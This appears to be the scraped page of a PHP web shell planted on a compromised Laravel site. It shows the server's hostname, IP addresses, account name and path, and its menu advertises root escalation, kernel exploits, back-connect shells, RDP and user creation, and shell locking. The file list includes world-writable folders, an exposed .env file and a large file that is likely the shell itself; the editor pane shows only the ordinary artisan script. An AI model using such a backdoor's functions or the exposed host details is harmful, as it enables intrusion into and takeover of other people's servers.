Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.216.164
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo11.com /
core /
[ HOME SHELL ]
Name
Size
Permission
Action
app
[ DIR ]
drwxrwxrwx
bootstrap
[ DIR ]
drwxrwxrwx
config
[ DIR ]
drwxrwxrwx
database
[ DIR ]
drwxrwxrwx
lang
[ DIR ]
drwxrwxrwx
plugins
[ DIR ]
drwxrwxrwx
resources
[ DIR ]
drwxrwxrwx
routes
[ DIR ]
drwxrwxrwx
storage
[ DIR ]
drwxrwxrwx
tests
[ DIR ]
drwxrwxrwx
vendor
[ DIR ]
drwxrwxrwx
.editorconfig
258
B
-rw-rw-rw-
.env
1.5
KB
-rw-rw-rw-
.env.example
1.04
KB
-rw-rw-rw-
.gitattributes
186
B
-rw-rw-rw-
.gitignore
243
B
-rw-rw-rw-
.htaccess
127
B
-r--r--r--
README.md
4.06
KB
-rw-rw-rw-
artisan
1.65
KB
-rw-rw-rw-
composer.json
2.9
KB
-rw-rw-rw-
composer.lock
413.08
KB
-rw-rw-rw-
goat1.php
143.87
KB
-rw-r--r--
package.json
226
B
-rw-rw-rw-
phpunit.xml
1.12
KB
-rw-rw-rw-
server.php
584
B
-rw-rw-rw-
vite.config.js
263
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : artisan
#!/usr/bin/env php <?php define('LARAVEL_START', microtime(true)); /* |-------------------------------------------------------------------------- | Register The Auto Loader |-------------------------------------------------------------------------- | | Composer provides a convenient, automatically generated class loader | for our application. We just need to utilize it! We'll require it | into the script here so that we do not have to worry about the | loading of any of our classes manually. It's great to relax. | */ require __DIR__.'/vendor/autoload.php'; $app = require_once __DIR__.'/bootstrap/app.php'; /* |-------------------------------------------------------------------------- | Run The Artisan Application |-------------------------------------------------------------------------- | | When we run the console application, the current CLI command will be | executed in this console and the response sent back to a terminal | or another output device for the developers. Here goes nothing! | */ $kernel = $app->make(Illuminate\Contracts\Console\Kernel::class); $status = $kernel->handle( $input = new Symfony\Component\Console\Input\ArgvInput, new Symfony\Component\Console\Output\ConsoleOutput ); /* |-------------------------------------------------------------------------- | Shutdown The Application |-------------------------------------------------------------------------- | | Once Artisan has finished running, we will fire off the shutdown events | so that any final work may be done by the application before we shut | down the process. This is the last thing to happen to the request. | */ $kernel->terminate($input, $status); exit($status);
Close